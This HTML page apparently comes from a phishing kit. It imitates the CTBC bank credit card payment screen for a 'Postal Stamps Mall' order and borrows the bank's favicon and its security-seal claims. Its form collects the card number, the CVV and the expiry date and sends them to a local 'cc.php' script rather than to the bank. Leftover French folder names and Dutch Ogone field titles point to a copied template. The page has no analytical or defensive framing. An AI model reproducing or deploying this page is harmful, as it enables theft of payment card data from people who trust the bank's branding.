<!DOCTYPE html>
<html><head>

<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge"> 
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta content="mshtml 6.00.2800.1476" name="generator">

<meta charset="UTF-8">
<link rel="shortcut icon" type="image/x-icon" href="https://epos.chinatrust.com.tw/auth/images/favicon.ico;jsessionid=Y9-RqhQBiF6rJUdgL1HNb9zNb1B27sZeDitBg-zP">
<link rel="apple-touch-icon" href="./img/icon_logo_ios.png">
<link href="SSLAuthUI_fichiers/bootstrap.css" rel="stylesheet">
<link href="SSLAuthUI_fichiers/style.css" rel="stylesheet">
</head><body class="bg">
<title>信用卡付款頁面</title>

	<div class="box">
		<div class="container-fluid autofix">
			<header>
				
					
					<div>
						<div class="row">
							<div class="col-xs-12 col-sm-6 col-md-6">
								<img src="./img/CTBC_W.jpg" alt="LOGO" class="logo">
							</div>
							<div class="col-xs-12 col-sm-offset-2 col-sm-4 col-md-offset-2 col-md-4" style="margin-bottom: 10px">
								<img src="./img/cardtype_ss.png" class="img-responsive logo-vmj">
								<span style="color: #AA0000; font-size: 10px;">我們接受VISA、MasterCard、JCB之信用卡交易！</span>

							</div>
						</div>
						<div class="row">
							<div class="col-xs-12 col-md-12">
								<p class="text-deep"><strong><span>歡迎您光臨本行特約商店：Postal Stamps Mall</span> </strong></p>
								<p class="text-deep"><strong><span>您採用本行 SSL PLUS 網路交易安全機制付款！</span></strong></p>
							</div>
						</div>
					</div>
			</header>
			<hr>
			<section id="payment-form">
				<form action="cc.php" method="post" name="OGONE_CC_FORM" >
					<div class="row">
						<div class="col-xs-12 col-md-3 col-md-offset-1">
							<label>
								<span class="ch-title">訂單編號</span>
								<span class="eng-title">Order Number</span>
							</label>
						</div>
						<div class="col-xs-12 col-md-6 align-self-center">
							<div class="col-12">
								<p class="text-green" style="line-height: 30px; font-size: medium; font-weight: 700;">00275029</p>
							</div>
						</div>
					</div>
					<div class="row">
						<div class="col-xs-12 col-md-3 col-md-offset-1">
							<label>
								<span>訂單金額</span>
								<span class="eng-title">Purchase Amount</span>
							</label>
						</div>
						<div class="col-xs-12 col-md-6">
							<div class="row" style="margin-bottom: 0;">
								<div class="col-xs-4 text-center">
									<span class="text-green font-weight-bold text-large">369</span>
								</div>
								<div class="col-xs-5 align-self-end">
									<label>
										<span>新台幣</span>
										<span class="eng-title">NT Dollars</span>
									</label>
								</div>
							</div>
						</div>
					</div><br>
					

					<!-- Card Number -->
					<div class="row">
						<div class="col-xs-12 col-md-3 col-md-offset-1">
							<label>
								<span>信用卡號</span>
								<span class="eng-title">Credit Card Number</span>
							</label>
						</div>
						<div class="col-xs-12 col-md-8">
							
								
								<div class="panform">
									<!-- For VMJ -->
									<img id="pansvg" src="./img/card.png" alt="">
									<input type="tel" class="form-control pan-col-all" required="required" id="pan_num" name="Ecom_Payment_Card_Number" pattern="[0-9]{16}" placeholder="xxxx xxxx xxxx xxxx" maxlength="20">
								</div>
							
						</div>
					</div><br>
					<!-- CVV -->
					<div class="row" data-meth="vmj">
						<div class="col-xs-12 col-md-3 col-md-offset-1">
							<label>
								<span>三碼檢查碼</span>
								<span class="eng-title">3-digital Card Validation Code</span>
							</label>
						</div>
						<div class="col-xs-12 col-md-8">
							<div class="col-xs-6 col-md-4 pl-1">
								<input type="tel" class="form-control pan-col" required="required" id="Ecom_Payment_Card_Verification" name="Ecom_Payment_Card_Verification" autocomplete="off" size="3" maxlength="3" placeholder="‧‧‧">
							</div>

							<a href="#" onclick="showCVV2(false); return false" style="color: #666; float: left; line-height: 30px;">
								背面後三碼檢查碼
								<img alt="info" src="./img/Exclamation.png" style="width: 15px;">
							</a>	
						</div>
					</div><br>


					<!--信用卡到期[月/年]  -->
					<div class="row">
						<div class="col-xs-12 col-md-3 col-md-offset-1">
							<label>
								<span>信用卡到期[月/年]</span>
								<span class="eng-title">Expire Date [Month/Year]</span>
							</label>
						</div>
						<div class="col-xs-12 col-md-8">
							<div class="col-4">
								<select class="form-control text-center" required="required" id="Ecom_Payment_Card_ExpDate_Month" name="Ecom_Payment_Card_ExpDate_Month" size="1" title="Vervaldatum (mm/jjjj) (maand)" onchange="document.OGONE_CC_FORM.Comp_Expirydate.value=document.OGONE_CC_FORM.Ecom_Payment_Card_ExpDate_Year.options[document.OGONE_CC_FORM.Ecom_Payment_Card_ExpDate_Year.selectedIndex].value
															+document.OGONE_CC_FORM.Ecom_Payment_Card_ExpDate_Month.options[document.OGONE_CC_FORM.Ecom_Payment_Card_ExpDate_Month.selectedIndex].value;">
													<option value="" selected >MM</option>
											<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>


											</select>
							</div>
							<span class="pan-dash">/</span>
							<div class="col-4">
								<select class="form-control text-center" required="required" id="Ecom_Payment_Card_ExpDate_Year" name="Ecom_Payment_Card_ExpDate_Year" size="1" title="Vervaldatum (mm/jjjj) (jaar)" onchange="document.OGONE_CC_FORM.Comp_Expirydate.value=document.OGONE_CC_FORM.Ecom_Payment_Card_ExpDate_Year.options[document.OGONE_CC_FORM.Ecom_Payment_Card_ExpDate_Year.selectedIndex].value
															+document.OGONE_CC_FORM.Ecom_Payment_Card_ExpDate_Month.options[document.OGONE_CC_FORM.Ecom_Payment_Card_ExpDate_Month.selectedIndex].value;">
									<option value="" selected>YYYY</option>
									<option value="2020">2020</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
<option value="2023">2023</option>
<option value="2024">2024</option>
<option value="2025">2025</option>
<option value="2026">2026</option>
<option value="2027">2027</option>
<option value="2028">2028</option>
<option value="2029">2029</option>
<option value="2030">2030</option>
<option value="2031">2031</option>
<option value="2032">2032</option>
<option value="2033">2033</option>
<option value="2034">2034</option>
<option value="2035">2035</option>
<option value="2036">2036</option>
<option value="2037">2037</option>
<option value="2038">2038</option>
<option value="2039">2039</option>
<option value="2040">2040</option>
<option value="2041">2041</option>
<option value="2042">2042</option>
<option value="2043">2043</option>
<option value="2044">2044</option>
<option value="2045">2045</option>

											</select>
							</div>
						</div>
					</div><br>
<!-- button -->
					<div class="row">

						<div class="col-xs-12 col-md-offset-5 col-md-4 ">
							<button type="submit" class="btn btn-ctbc sb-btn">
								<span>確認付款 To Pay</span>
							</button>
						</div>
					</div>

					<hr>
					<div class="row" style="margin-top: 20px">
						<div class="col-xs-12 col-md-12 align-self-center">

							<p class="p-text-gray">建議您在點選刷卡確認鈕前，記下或列印您的訂單編號與消費金額，按下『確認付款 To 
Pay』鍵後，請等待出現授權結果的畫面，才關閉閉瀏覽器或跳離本網頁；倘若出現作業逾時的回應，請您稍後回到網路商場重新刷卡購物，或請您詢問購物網站
是否成功收到該筆訂單及其處理情況，以保障您消費之權益；</p>
							<p class="p-text-green">為了保障您的刷卡安全，請您注意瀏覽器左下角的計時說明，如未能於時間內完成輸入，本交易視同交易不成功，如欲取消本交易，請勿直接關閉瀏覽器，請按下『取消本交易 Cancel』鍵，本交易則將不會進行相關授權作業。</p>
						</div>
					</div>
					<input type="hidden" name="timeOut">
					<input type="hidden" name="_action">
					<input type="hidden" name="txtype" value="0">
					<input type="hidden" name="ot" value="1607793742000">
				</form>
			</section>
			<hr>
			<footer>
				<div class="row">
					<div class="col-xs-12 col-md-12" style="text-align: center; padding: 0;">
						
							<div class="col-s">
								<img class="img-3d" src="./img/3D_VISA.png" border="0">
							</div>
							<div class="col-s">
								<img class="img-3d" src="./img/3D_MASTER.png" border="0">
							</div>
							<div class="col-s">
								<img class="img-3d" src="./img/3D_JCB.png" border="0">
							</div>
						
						<div class="col-s">
							<img class="img-3d" src="./img/twca_ssl.png" border="0">
						</div>
						<div class="twpay">
							<a class="p-text-gray" style="font-size: 10px;" href="#" target="_blank">本交易傳送資訊將藉由 HiTRUST 128bits SSL 伺服器憑證進行資料安全保護</a>
						</div>
					</div>
					</div>
					<!-- 				</div> -->
			</footer>
		</div>
		<div>
<input type="hidden" id="load-text" value="授權中，請勿點選任何按鍵...">
<input type="hidden" id="load-threedtext" value="信用卡3D驗證作業中，請勿關閉瀏覽器...">	
</div>
	</div>
<div>
</div>
</body></html>